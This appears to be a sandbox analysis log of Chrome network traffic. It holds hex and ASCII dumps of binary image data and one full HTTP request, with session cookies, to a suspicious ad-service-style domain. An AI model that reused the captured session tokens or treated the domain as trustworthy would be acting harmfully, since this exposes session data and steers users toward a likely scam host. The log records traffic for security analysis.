                                                                                                                                      2024-05-08 18:12:52 UTC1369INData Raw: 0d 1c 67 00 e7 50 9f 95 44 24 49 9d b3 1a f0 47 60 db e8 20 92 24 49 92 24 49 92 24 49 52 95 1b 1f 4e 03 8e 8f 0e 21 49 aa bc 97 80 3d 80 7b a2 83 48 92 24 49 92 24 49 92 24 a9 7b 55 75 05 8e af 60 f3 86 24 29 8f 11 c0 75 b8 9d 8a 24 49 92 24 49 92 24 49 92 02 55 71 05 8e 63 81 6f 46 87 90 24 d5 ce 04 60 77 e0 81 e8 20 92 24 49 92 24 49 92 24 49 ea 3e 55 6b e0 f8 2c 70 56 74 08 49 52 6d fd 9b d4 c4 f1 60 74 10 49 92 24 49 92 24 49 92 24 75 97 2a 35 70 1c 05 9c 1b 1d 42 92 54 7b 4f 03 bb 02 8f 45 07 91 24 49 92 24 49 92 24 49 52 f7 a8 4a 03 c7 11 c0 79 54 27 af 24 a9 da 9e 20 35 71 8c 0b ce 21 49 92 24 49 92 24 49 92 a4 2e 51 85 86 88 f7 00 57 00 bd d1 41 24 49 5d e5 31 e0 3f 80 e7 a3 83 48 92 24 49 92 24 49 92 24 a9 fe ca de c0 b1 23 70 13 30 34 3a 48 cd
                                                                                                                                      Data Ascii: gPD$IG` $I$I$IRN!I={H$I$I${Uu`$)u$I$I$IUqcoF$`w $I$I$I>Uk,pVtIRm`tI$I$I$u*5pBT{OE$I$I$IRJyT'$ 5q!I$I$I.QWA$I]1?H$I$I$#p04:H
                                                                                                                                      2024-05-08 18:12:52 UTC1369INData Raw: 40 fc 39 d5 e9 7a 77 8e c1 93 24 49 92 24 49 92 24 49 92 8a f6 51 e2 27 d7 3a 59 37 00 6b 67 19 39 95 c5 bc 46 8e 7f 10 7f 7e d5 a9 66 00 97 01 9b 2c fd a1 50 45 bc 03 78 86 f8 73 ac 53 35 1e 18 99 65 e4 24 49 92 24 49 92 24 49 92 a4 82 ac 01 4c 24 7e 72 ad 13 35 13 38 06 57 dd a8 b3 5e e0 60 60 0c f1 e7 5b 95 6b 2a f0 5d d2 d6 4a aa af 55 81 9b 89 3f df 3a 55 97 66 19 35 49 92 24 49 92 24 49 92 24 a9 20 57 13 3f a9 d6 89 7a 16 d8 2d cf 90 a9 02 7a 81 f7 00 0f 12 7f ee 55 a9 66 00 df 03 56 6f 7e c8 55 51 03 81 33 89 3f f7 3a 55 fb e6 19 36 49 92 24 49 92 24 49 92 24 29 af 43 89 9f 4c eb 44 dd 85 2b 09 74 a3 cd 81 a7 89 3f ff aa 50 73 80 2b 80 8d 5a 1a 69 d5 c1 01 c0 4b c4 9f 8b 45 d7 d3 c0 88 4c 63 26 49 92 24 49 92 24 49 92 24 65 b1 22 30 81 f8 c9 b4 a2
                                                                                                                                      Data Ascii: @9zw$I$I$IQ':Y7kg9F~f,PExsS5e$I$I$IL$~r58W^``[k*]JU?:Uf5I$I$I$ W?z-zUfVo~UQ3?:U6I$I$I$)CLD+t?Ps+ZiKELc&I$I$I$e"0
                                                                                                                                      2024-05-08 18:12:52 UTC1369INData Raw: 00 ec d1 f6 28 4a e5 72 3e f1 d7 56 8e da 36 f7 c0 48 92 24 49 92 24 49 92 24 a9 3b 8c 02 a6 12 3f e1 d5 6e 7d 25 f7 c0 a8 b4 06 00 57 11 7f ce 45 d5 c3 c0 46 6d 8f a2 54 3e cb 03 4f 10 7f 8d b5 5b 97 64 1e 17 49 92 24 49 92 24 49 92 24 75 89 e3 89 9f ec 6a b7 1e 02 96 c9 3d 30 2a ad ef 10 7f ce 45 d5 f5 c0 88 f6 87 50 2a ad b7 11 7f 9d b5 5b d3 80 d1 b9 07 46 92 24 49 92 24 49 92 24 49 f5 36 80 7a 3c ed bc 6b ee 81 51 69 7d 96 f8 f3 2d aa be 4d ba 66 a5 ba fb 25 f1 d7 5b bb f5 a5 ec a3 22 49 92 24 49 92 24 49 92 a4 5a db 8b f8 49 ae 76 eb ca ec a3 a2 b2 7a 3b 30 8b f8 73 ae d3 35 0b 38 2a c3 f8 49 55 b1 3e 69 15 8b e8 6b af 9d fa 67 f6 51 91 24 49 92 24 49 92 24 49 52 ad fd 88 f8 49 ae 76 6a 06 b0 51 f6 51 51 19 6d 0b 4c 26 fe 9c eb 74 bd 42 6a 5c 91 ba
                                                                                                                                      Data Ascii: (Jr>V6H$I$I$;?n}%WEFmT>O[dI$I$I$uj=0*EP*[F$I$I$I6z<kQi}-Mf%["I$I$IZIvz;0s58*IU>ikgQ$I$I$IRIvjQQQmL&tBj\
                                                                                                                                      2024-05-08 18:12:52 UTC1369INData Raw: 46 e6 b1 91 fa 33 84 6a 3f 20 d8 b7 1e 21 35 71 49 aa 89 0f 13 ff 85 a5 d5 fa 49 01 e3 a1 72 d8 99 d4 a0 13 7d 8e 75 a2 a6 e2 de 7e 52 ab d6 02 66 12 7f 1d b7 52 2f 02 83 f2 0f 89 54 2a 2b 02 47 50 ed d5 de ba a5 66 03 37 02 87 02 c3 fa 3b 98 92 d4 61 a7 12 ff b5 d1 aa 7e 3d 49 5a c9 e5 9d c0 b2 48 92 54 6f 57 11 7f ef cd 55 8f 66 1e 1b a9 3f fb 11 7f ae e7 ac 6d f2 0e 8f a4 48 bf 22 fe 8b 4a ab b5 53 01 e3 a1 78 ab 03 e3 89 3f bf 3a 51 53 80 3d f3 0c 9b d4 b5 ae 24 fe 5a 6e b5 76 2f 60 3c a4 32 d8 16 b8 18 78 95 f8 eb cc 6a be 5e 06 fe 07 d8 6a e1 03 2b 49 1d 74 0b f1 5f 0f ad 7a d5 34 e0 f7 c0 67 80 8d 90 24 a9 7e fe 4d fc fd 36 67 2d 97 77 78 a4 d7 38 8d f8 f3 3c 67 7d 28 eb e8 48 0a 33 14 98 4c fc 17 95 56 ea be 02 c6 43 f1 06 00 37 11 7f 7e 75 a2 26
                                                                                                                                      Data Ascii: F3j? !5qIIr}u~RfR/T*+GPf7;a~=IZHToWUf?mH"JSx?:QS=$Znv/`<2xj^j+It_z4g$~M6g-wx8<g}(H3LVC7~u&
                                                                                                                                      2024-05-08 18:12:52 UTC1369INData Raw: 49 92 24 49 25 d0 5f 03 c7 f6 1d 4f 91 87 db a7 54 df 76 c0 17 a3 43 14 e8 29 60 3f 60 52 74 10 a9 cb bd 08 dc 19 1d a2 05 db 46 07 50 57 58 01 b8 80 f4 44 e8 6a c1 59 d4 dd 3e 0c dc 03 bc 21 3a 88 24 49 05 1b 04 7c 96 b4 65 dd 7b 82 b3 48 92 24 49 92 82 f5 d7 c0 f1 fa 8e a7 68 df 74 e0 0f d1 21 d4 96 e1 a4 7d cf 07 45 07 29 c8 44 d2 93 35 4f 45 07 91 04 54 b3 e9 6f 2d 60 95 e8 10 aa b5 9d 80 31 a4 6d be a4 32 d8 84 d4 70 77 54 74 10 49 92 3a 60 55 e0 17 c0 ff c3 ef fb 25 49 92 24 a9 6b f5 d7 c0 51 c5 a7 dc 6e 06 26 47 87 50 5b ce 24 ed 01 5b 47 d3 81 77 01 ff 88 0e 22 e9 ff 5c 13 1d a0 45 55 6c b2 54 f9 f5 90 56 c0 ba 99 d4 28 24 95 c9 10 e0 5c e0 c7 c0 b0 e0 2c 92 24 75 c2 fb 80 07 80 43 a2 83 48 92 24 49 92 3a af 2e 2b 70 b8 fa 46 b5 bd 9d fa 3e ed 3b
                                                                                                                                      Data Ascii: I$I%_OTvC)`?`RtFPWXDjY>!:$I|e{H$Iht!}E)D5OETo-`1m2pwTtI:`U%I$kQn&GP[$[Gw"\EUlTV($\,$uCH$I:.+pF>;
                                                                                                                                      2024-05-08 18:12:52 UTC1369INData Raw: 80 4a e3 10 e0 ec e8 10 52 c9 f5 02 3f 02 b6 89 0e 22 49 52 87 0d 00 2e 23 6d 2b 26 49 92 24 49 dd 6e f5 02 3e 7e 74 3f bf 37 1c 38 72 09 ff d6 89 a4 2d 30 17 b6 ea bc 06 8e 35 9b 08 56 16 8f 44 07 d0 12 1d 4e 5a 81 a3 4e 2e 03 be 1f 1d 42 52 76 55 bb a7 8c 00 96 8d 0e a1 70 6f 25 2d 8d dd 13 1d 44 aa 80 e1 c0 55 f4 ff 03 95 24 49 75 36 af 89 e3 1d d1 41 24 49 92 24 a9 8b fc 17 b0 dc 22 fe ec 2d c0 56 8b fa c0 81 8d b7 ab e6 4e d4 01 55 7b 5a ba db ac 08 7c 2d 3a 44 66 8f 02 9f 8a 0e 21 a9 10 55 bc a7 ac 46 f5 1a 4f 94 cf 36 c0 2f e9 bf 43 57 52 ff d6 06 7e 4e fa 01 69 56 70 16 49 92 3a 69 20 f0 33 52 03 f0 9f 83 b3 48 92 24 49 52 94 cb 80 c7 fb f9 fd ad 81 8d fb fc fa 71 e0 9e 7e fe de 5d 4d fc 5f cb 93 9a 38 be dd cf 9f 1d b5 b8 0f 9c d7 c0 d1 ee 72 21
                                                                                                                                      Data Ascii: JR?"IR.#m+&I$In>~t?78r-05VDNZN.BRvUpo%-DU$Iu6A$I$"-VNU{Z|-:Df!UFO6/CWR~NiVpI:i 3RH$IRq~]M_8r!
                                                                                                                                      2024-05-08 18:12:52 UTC1369INData Raw: 1d 1e 75 a1 65 80 af 92 26 0c 17 77 ae fd 18 97 c3 2f 9b bd 88 ff 1a d4 6c f9 a2 76 3d 0d 06 ee 22 fe fc aa 7a dd 0a 7c 90 fa 3f e5 3b 08 38 80 d4 cd 3d 93 f8 71 af 7a cd db 97 52 52 f9 8d 25 fe 6b 46 11 75 4c ce 41 aa b8 95 48 ab 4f 1d 05 fc 84 d4 10 1f 7d 7c ea 5e 13 80 d5 97 7c 68 24 49 15 34 84 f8 fb 4c ee 5a 2f eb 08 49 af 75 19 f1 e7 79 ce 3a 36 ef f0 48 b5 72 16 0b 5e 2f ff d3 c4 c7 f6 7d 4d b6 bf 45 28 fe b4 d0 bf 7d 57 3f 7f e7 e5 be 7f a7 97 ea 2d c1 3e 31 3a 80 16 70 06 d0 1b 1d 22 93 df 90 9e ce 95 5a b5 07 a9 c9 ec 24 96 3c 61 f8 01 e0 16 60 95 a2 43 69 a9 55 f1 fe 52 b5 55 b4 b4 74 be 0a 6c 17 1d a2 a2 26 01 e7 02 9b 03 bb 90 9a e5 ea be 4a cd 4c e0 2a 60 7f d2 53 cb 5f 04 1e 09 4d 54 6d 5f 25 4d 18 4a 92 e2 bd 00 dc 0c 7c 9b b4 ad dc ba a4
                                                                                                                                      Data Ascii: ue&w/lv="z|?;8=qzRR%kFuLAHO}|^|h$I4LZ/Iuy:6Hr^/}ME(}W?->1:p"Z$<a`CiURUtl&JL*`S_MTm_%MJ|
                                                                                                                                      2024-05-08 18:12:52 UTC1369INData Raw: 49 ea 06 bd a4 2d 02 a4 25 e9 a1 3e ab 6f 7c 9d b4 6c aa b4 b0 bd 48 13 58 5f 06 86 04 65 58 1f 57 e1 88 54 b5 c9 e2 aa 35 61 6a 41 67 e1 b6 49 0b bb 11 d8 06 b8 3d 3a 48 97 9a 0c 1c 0c 7c 0e 98 19 9c a5 4c 36 07 f6 8b 0e 21 49 2a cc 44 e0 e3 c0 bb 80 e7 83 b3 94 d9 37 88 fb 39 59 92 24 49 92 ba 46 15 b7 50 71 ff f3 18 07 90 f6 a0 af ba 47 81 6f 46 87 50 e9 8c 06 2e 07 ae 07 36 08 ce 02 ae c2 11 a9 6a f7 98 aa dd c3 35 df 3e c0 be d1 21 4a e6 3b a4 31 79 31 3a 88 38 9b b4 7d cd 0b d1 41 4a e4 84 e8 00 92 a4 c2 fd 9a d4 48 7a 73 70 8e b2 5a 1f 38 2a 3a 84 24 49 92 24 d5 9d 0d 1c 5a 1a 3d c0 49 d1 21 32 39 0a 98 16 1d 42 a5 d1 03 1c 0e 3c 08 1c 12 9c a5 af 0d 80 0f 46 87 e8 52 55 5b 81 a3 6a f7 70 25 3d c0 d7 a2 43 94 c8 2c d2 53 af 47 e1 56 79 65 72 1b f0
                                                                                                                                      Data Ascii: I-%>o|lHX_eXWT5ajAgI=:H|L6!I*D79Y$IFPqGoFP.6j5>!J;1y1:8}AJHzspZ8*:$I$Z=I!29B<FRU[jp%=C,SGVyer


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      59192.168.2.1649781104.21.15.1404435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:52 UTC1561OUTGET /opbVIbbiIjSZq4kw2Hc7sTSmbHWJiruv16eLwu5PtXm7oiXGRy20hh485cd240 HTTP/1.1
                                                                                                                                      Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                      Referer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQ
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: XSRF-TOKEN=eyJpdiI6IktLSk1OclZ1d05BNFJobUtvQW1pU3c9PSIsInZhbHVlIjoiYVdoNUFQNTFHRzN3Y01MMVdrbW5BR2Z4OHJ0OExEL1ZxS2VmYmhNVEhONzRPcjZVRXdna2dyVC9uM0dtMFhBRDRjSWpyMEh5RnRpcWNLNkhGMjVsYzNoTDBHelc2Q1doTWZ4U1lZakx0NDkxd3dnb0k1MC83ZmdGSDdlTzVwcEgiLCJtYWMiOiI0YjMyZjU3MzU2NTk1ZDgwMjZkN2FiMWExMDI4MjAxMzYyNDUyNjc0Mzc4OGY3NTkyMWMzOTJjMjdjY2JmMzcyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhCYkVnU3N6Yzc5K3hTMmt2MDFyNGc9PSIsInZhbHVlIjoibjkyM0RzcE9SNEdoUXptdEVqMHd5NGlnYmNhMFpld2ltWkFzWkw0REJObVlxZDczbVdYTlBxbDc4MjIreWJNejhGUVJuZUE3UFNQZ05TRFZncThwYTk0R0ZUaEprSEQ1SHBVS2s2WVFQS2F1cWpYQWh0MDNWREtOUzJXaFg1RWIiLCJtYWMiOiI0N2JlN2ZiNjQ1ZDk5M2IzZDc2MzIwYWQ2ZmJhZTVkYTBmZWMxZTIxOWViZWIzNmQyMTFjZjliYTM1MTA5ZmJmIiwidGFnIjoiIn0%3D
                                                                                                                                      2024-05-08 18:12:52 UTC652INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 08 May 2024 18:12:52 GMT
                                                                                                                                      Content-Type: image/png
                                                                                                                                      Content-Length: 29796
                                                                                                                                      Connection: close
                                                                                                                                      Content-Disposition: inline; filename="opbVIbbiIjSZq4kw2Hc7sTSmbHWJiruv16eLwu5PtXm7oiXGRy20hh485cd240"
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ku3m%2B8ZsPnO4zf5cyUR0zzhKzUv6SKH2QwabiUU4M0wLNjvXWjwIEeHcXEaxjAW6Vg7pR0Z9oXhZ8zPCPq9qyZWU3GHzG39pdXWOsKaZyr3sELZmv8pMWBG8ZggiTw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6ba2dd6675f1-SEA
                                                                                                                                      2024-05-08 18:12:52 UTC717INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 fa 00 00 01 2f 08 06 00 00 00 ad e6 03 d5 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 20 00 49 44 41 54 78 5e ec 5d 07 58 53 49 17 3d 88 20 4d b0 80 14 11 54 b0 60 03 b1 8b 58 10 c5 de c5 82 bd ae 7d 7f 5d fb ae 7d ed ab ae ae ae 65 d7 ae 6b ef 1d 7b af 28 2a 56 ec a2 a0 82 82 60 a1 f8 fe 6f 26 10 13 29 69 2f c9 cb cb cc f7 c5 48 32 73 e7 de 73 ef 9b 93 79 6f e6 8e 09 58 61 08 30 04 18 02 0c 01 86 00 43 40 b4 08 98 88 d6 32 66 18 43 80 21 c0 10 60 08 30 04 18 02 60 44 cf 82 80 21 c0 10 60 08 30 04 18 02 22 46 80 11 bd 88 9d cb 4c 63 08 30 04 18 02 0c 01 86 00 23 7a 03 8b 81 b0 1b e1 dc a1 83 07 10 15 15 85 d7 af 5e e1 d5 ab 57 f8 f6 ed 1b 0a 17 76 45 61 d7 c2 28 52 c4 0d d5 ab 57 87 6f a5 4a c8 6b
                                                                                                                                      Data Ascii: PNGIHDR/sRGB IDATx^]XSI= MT`X}]}ek{(*V`o&)i/H2ssyoXa0C@2fC!`0`D!`0"FLc0#z^WvEa(RWoJk
                                                                                                                                      2024-05-08 18:12:52 UTC1369INData Raw: c5 8a a1 48 91 22 70 2d 52 04 4e 85 1c 58 ec 68 ec 15 26 80 21 c0 10 60 08 68 1f 01 36 58 f3 80 f1 b0 9f 7f e6 8e 86 86 f2 20 e9 bb 08 33 33 73 0c 1d 3b 59 a9 e7 f1 39 75 1c 11 1e 86 63 07 77 23 ee dd 5b 5e f5 73 75 75 85 9b bb 3b 25 fe 0a de de a8 57 2f 00 76 79 6d 58 3c f1 8a 32 13 c6 10 60 08 30 04 34 47 80 0d cc 1a 62 78 f7 fe 03 ae 43 fb 76 72 2b dc 35 14 49 9b 07 b5 68 87 1a b5 03 d4 12 95 92 9c 8c f0 b0 cb 38 7f 22 14 71 b1 fc 12 7c 76 0a 11 e2 af 5b 2f 00 f5 ea d5 43 f5 6a 55 59 5c a9 e5 39 d6 88 21 c0 10 60 08 f0 8f 00 1b 90 35 c4 74 c9 df 4b b9 c5 7f 2d a2 52 1a 34 68 88 05 0b e6 ab 85 69 f8 cd 5b 5c e7 4e 1d a9 9c 3c 79 2c 30 6a ca 6c 95 9f cb 47 bf 7a 89 db 37 ae e1 c6 95 0b 48 fc 98 90 a5 65 e6 e6 79 e0 e8 52 18 4e 2e ae 28 5c a4 28 0a bb 15
                                                                                                                                      Data Ascii: H"p-RNXh&!`h6X 33s;Y9ucw#[^suu;%W/vymX<2`04GbxCvr+5Ih8"q|v[/CjUY\9!`5tK-R4hi[\N<y,0jlGz7HeyRN.(\(
                                                                                                                                      2024-05-08 18:12:52 UTC1369INData Raw: 2d 5a b8 90 ca ac 59 27 10 0d 9b b7 c1 97 2f 5f b0 7c fe 0c b9 a4 37 e4 73 f2 bd 21 97 07 77 6e 61 d7 e6 75 72 cf ee 27 4e 9a 84 60 0d ef 8a 30 a2 37 e4 a8 60 ba f3 81 00 23 7a 3e 50 14 9f 0c 8d 09 4a 7c 90 e4 6c d1 87 84 04 2e b8 5d 7b 44 45 49 16 ce ad f8 f7 5f d4 ac 5e 5d 63 1c 65 ef 12 90 63 68 eb 37 6d 85 3d 9b d7 49 67 be a4 af 36 9d 7b a0 82 6f 55 51 40 4e f6 df ef da bc 56 2e 35 ef 88 5f 46 a2 57 cf 1e 6a 63 c9 88 5e 14 a1 c1 8c d0 00 01 46 f4 1a 80 27 e2 a6 6a 0f aa 22 c6 24 47 d3 76 ec da c5 fd 36 7e 3c ad 43 72 bc ff b7 71 23 2f 18 7e 4c fa c4 05 b7 6b 87 e7 cf b3 4e f0 d2 ad ff 30 14 2f 51 4a 54 b0 bf 89 7e 85 5d 9b d6 e2 d5 cb e7 52 bb 7e 1a 30 00 43 06 0f 56 0b 53 46 f4 a2 0a 0f 66 8c 1a 08 30 a2 57 03 34 23 68 a2 d6 80 6a 04 b8 64 6b e2 90
                                                                                                                                      Data Ascii: -ZY'/_|7s!wnaur'N`07`#z>PJ|l.]{DEI_^]cech7m=Ig6{oUQ@NV.5_FWjc^F'j"$Gv6~<Crq#/~LkN0/QJT~]R~0CVSFf0W4#hjdk
                                                                                                                                      2024-05-08 18:12:52 UTC1369INData Raw: da 07 0f 31 e1 8a e4 ee 0f 29 25 ed ec f0 6b 25 5f d4 76 76 92 7e b6 f2 de 7d 4c b9 16 26 fd db df d9 09 fe 4e 4e 70 b0 b4 14 dc a5 15 fb e5 0b 8e 45 bd c2 85 98 18 c1 e9 66 2c 0a 31 a2 37 16 4f 6b cf 4e b5 06 54 ed a9 23 2c c9 b1 ef 3f d0 45 78 b1 b1 b1 54 b1 35 6b d7 a1 72 25 5f 8d 31 cb 6a 36 1f 79 ef 0e ce 1c 3b 48 fb a9 1b d4 0c 7e 75 1b 08 0b 0c 9e b5 89 79 fd 8a ce e2 6f 86 5d 96 93 3c 6a f4 18 74 ef d6 55 2d 8c f9 24 fa 62 79 f3 e2 44 8b 66 99 ac 0e da 7f 00 f7 3f c4 d3 cf 03 0a bb 60 65 dd 3a 72 75 e2 be 7e 85 ef 36 c9 e2 4a 52 c8 6c 7e 4d bd ba 99 e4 14 dd f0 9f f4 b3 21 e5 ca 62 84 77 05 9e 11 e6 4f 5c e8 cb 28 f4 3d 25 39 42 99 15 dd 23 c0 88 5e f7 98 8b ad 47 b5 06 54 b1 81 90 9d 3d b2 b9 e7 2b 57 a9 82 35 ab 57 f3 82 97 ec 6c be a4 57 39 bc
                                                                                                                                      Data Ascii: 1)%k%_vv~}L&NNpEf,17OkNT#,?ExT5kr%_1j6y;H~uyo]<jtU-$byDf?`e:ru~6JRl~M!bwO\(=%9B#^GT=+W5WlW9
                                                                                                                                      2024-05-08 18:12:52 UTC1369INData Raw: 97 f3 96 53 e0 e1 dd db d8 b7 7d 13 e2 3f c4 a1 aa 5f 1d d4 6f d2 12 79 f2 e4 4c 94 fa f2 61 c2 87 f7 94 e0 2f 9f 3b 25 a7 42 ed 6a ae e8 d5 a1 1c 7c cb 4b d6 1f 28 53 4c 5d 46 69 8c 33 23 7a 65 90 66 75 0c 0d 01 46 f4 86 e6 31 e1 e9 ab f1 e0 2a 3c 93 34 d3 28 b8 43 07 2e e2 f6 6d 2a 64 f6 9c b9 68 da a4 31 2f 18 ed 3b 70 80 1b 3d 72 24 95 6b 97 af 00 06 8f 9e 00 33 33 c9 82 34 52 c8 ed ee fd db ff c3 bd 88 9b 70 72 71 45 ab 8e dd e8 bb 50 cb 95 f3 a7 41 56 d4 7f 88 93 64 0d 24 85 2c b6 1b da cb 97 92 bc aa e5 ab 6d 67 58 d9 b8 6a 84 35 23 7a 55 51 67 f5 0d 01 01 46 f4 86 e0 25 61 eb a8 d1 c0 2a 6c d3 54 d7 ee ec f9 f3 5c ff be 7d 69 43 37 37 37 1c 3c 78 90 37 7c d6 ac 5b c7 cd 9e 39 93 ca 2e 5f b1 0a da 86 48 ce 42 27 e5 f2 b9 93 38 76 40 92 4d ad 7e 93
                                                                                                                                      Data Ascii: S}?_oyLa/;%Bj|K(SL]Fi3#zefuF1*<4(C.m*dh1/;p=r$k334RprqEPAVd$,mgXj5#zUQgF%a*lT\}iC777<x7|[9._HB'8v@M~
                                                                                                                                      2024-05-08 18:12:52 UTC1369INData Raw: 4f 4e 46 cc e7 cf bc f5 65 8c 82 18 d1 1b a3 d7 f9 b5 59 a3 81 95 5f 55 f4 23 ed c0 c1 43 dc c8 5f 46 d0 ce bd 7d 7c b0 71 c3 06 ad 60 22 7b eb be a8 47 09 3c 7d f4 10 ae 6e 45 d1 ac 5d e7 4c 89 71 48 32 1a 72 9b fe cb 97 cf 08 6c da 0a b5 ea 35 94 03 87 1c 1c 43 d2 e3 92 ef 34 c9 9a 77 eb fa 15 7a 9b 9e 6c ef cb 28 24 5d 2d 21 78 b2 a0 4e 95 72 e4 f4 53 fc 32 55 92 21 cf b7 9c 23 56 cf 6f a4 4a 73 a4 58 d5 86 45 be ea 1a 61 cf 88 5e 25 c8 d5 aa ec 69 67 0b ef 82 05 e1 95 2f 1f 4a d8 d9 c1 c3 ce 16 2e 56 56 c8 65 92 b5 eb 52 39 0e af 92 92 f0 28 21 01 0f e3 13 70 f7 fd 7b 84 c7 c6 e1 71 fa 09 8e 6a 29 61 64 8d 18 d1 1b 99 c3 b5 60 ae 46 03 ab 16 f4 d1 b9 c8 a1 c3 86 71 c7 8e 1e a5 fd 8e 18 39 12 bd 7a f4 d0 0a 26 2d 5b b6 e4 22 23 25 47 b6 e6 b1 b0 40 50
                                                                                                                                      Data Ascii: ONFeY_U#C_F}|q`"{G<}nE]LqH2rl5C4wzl($]-!xNrS2U!#VoJsXEa^%ig/J.VVeR9(!p{qj)ad`Fq9z&-["#%G@P
                                                                                                                                      2024-05-08 18:12:52 UTC1369INData Raw: 9f 10 b4 d7 78 70 15 82 11 aa ea 10 fd e6 2d 17 18 50 0f 64 d6 4b ca 96 ad db 50 b6 8c 97 56 b1 b8 7e 23 9c eb 12 d2 99 f6 67 69 69 85 d1 53 e7 ca a9 1d 11 7e 8d 3e 8b 27 04 5e a3 4e 7d 04 34 6a 2e 97 03 9f 24 cc d9 b7 7d a3 e4 56 7f 31 4f 34 6b d7 29 53 0a 5d 52 87 6c bb 23 8b fa 64 4b 5e 1b 73 7c 4c 4c a6 1f 91 5b f5 3b ff 69 a9 2a 64 99 ea 93 85 77 13 e6 9e c3 f9 ab 92 0c 7a 65 4b 16 c4 da 3f 9b c0 2c 77 2e 95 64 a7 99 97 82 b9 7d 4b 5e b0 67 44 af 12 f4 74 cf fb 80 32 65 30 a0 6c 19 8d 57 d2 ab d6 b3 f2 b5 c9 b3 fb bf 23 ee 60 c5 dd 7b ca 37 12 59 4d 46 f4 22 73 a8 1e cc e1 65 80 d5 83 de 1a 75 f9 df a6 cd dc b4 a9 53 a8 8c 7a f5 02 f0 d7 5f 8b 74 82 43 fd c0 40 2e fa f5 6b da 6f df 61 a3 51 b8 88 3b e2 3f bc a7 b7 e9 9f 44 de 47 61 b7 a2 68 d5 a1 ab
                                                                                                                                      Data Ascii: xp-PdKPV~#giiS~>'^N}4j.$}V1O4k)S]Rl#dK^s|LL[;i*dwzeK?,w.d}K^gDt2e0lW#`{7YMF"seuSz_tC@.koaQ;?DGah
                                                                                                                                      2024-05-08 18:12:52 UTC1369INData Raw: d8 b7 92 63 74 49 29 ea 56 08 bd 82 4b a0 55 90 a7 90 e1 ce 52 37 6d dc b2 cf e8 88 11 7d f6 e1 40 08 9e 10 3d df 25 39 25 05 4f a3 62 f0 fa 4d 1c 3e 26 7d 42 4a 4a 2a f2 da 58 c1 3e bf 2d 8a 16 76 42 3e 5b 1b be bb a4 f2 12 53 52 30 fa e2 65 ec 7f fe 5c 2b f2 85 24 94 11 bd 90 bc 61 98 ba e8 9c e8 f4 05 d3 83 c8 48 ae 75 4b c9 fe f1 bc 79 6d b1 6d c7 0e b8 ba 38 eb c5 fe b9 7f fc c1 ad 5a b9 92 ea 62 63 6b 87 fe 3f 8f a1 09 72 64 0b 49 76 43 9e c3 df 8f b8 29 f7 39 59 57 d0 ad 5b 77 38 98 1e 43 ae 54 c3 7a 4e c9 99 58 22 d9 ae 0b ac ac f2 6b 05 77 46 f4 59 5f 5d 2e d6 56 f8 d3 af 26 aa 38 f0 7b e7 e7 65 f4 5b 5c bb fd 00 29 a9 69 d9 5e d6 c5 5c 9d e0 5b b6 24 34 38 4a 21 5b d9 c7 a3 5e e1 e7 f3 e7 91 90 fc 7d 07 88 be c6 17 6d f6 cb 88 5e 9b e8 1a 87 6c
                                                                                                                                      Data Ascii: ctI)VKUR7m}@=%9%ObM>&}BJJ*X>-vB>[SR0e\+$aHuKymm8Zbck?rdIvC)9YW[w8CTzNX"kwFY_].V&8{e[\)i^\[$48J![^}m^l
                                                                                                                                      2024-05-08 18:12:52 UTC1369INData Raw: 1f 22 57 ca 53 5e 60 27 47 cc a6 99 97 40 9a 79 69 58 5b d9 09 02 57 46 f4 df 5d 5b b5 50 21 6c 69 50 9f 17 5f ff 28 e4 c0 c9 4b f8 f4 e5 fb 09 88 ca 76 e2 5f a5 3c 1c 0b 66 7f b6 82 b2 72 b2 aa 47 96 0c 04 ed 3f 80 07 1f c4 97 ff 9e 11 bd 26 91 c1 da 12 04 04 31 40 6b c3 15 09 89 49 5c ed 5a 7e 48 49 91 64 cd 5a b7 7e 03 7c 2b fa 88 d6 5e 65 31 fc f4 29 9e cb 95 f2 82 66 d5 33 49 7b 83 5c a9 af 15 37 35 31 05 97 2b 3f be e5 76 c2 b7 dc ce f8 96 bb 08 ac ac ed 05 87 25 23 fa ef ae 0c f6 28 8e d9 d5 ab 29 f6 ad 1a 35 ce 85 45 e0 f5 1b d5 b7 73 b6 ac 5f 13 66 66 b9 d5 e8 51 b9 26 7d 4f 9d 41 e8 cb 97 ca 55 36 a0 5a 8c e8 0d c8 59 02 55 55 70 83 35 5f 38 6d dd be 9d 9b 34 61 02 15 e7 e7 57 0b cb 97 2f 13 ad ad 9a 62 f6 29 29 96 33 e1 92 80 6f e4 f6 7e 6a ba
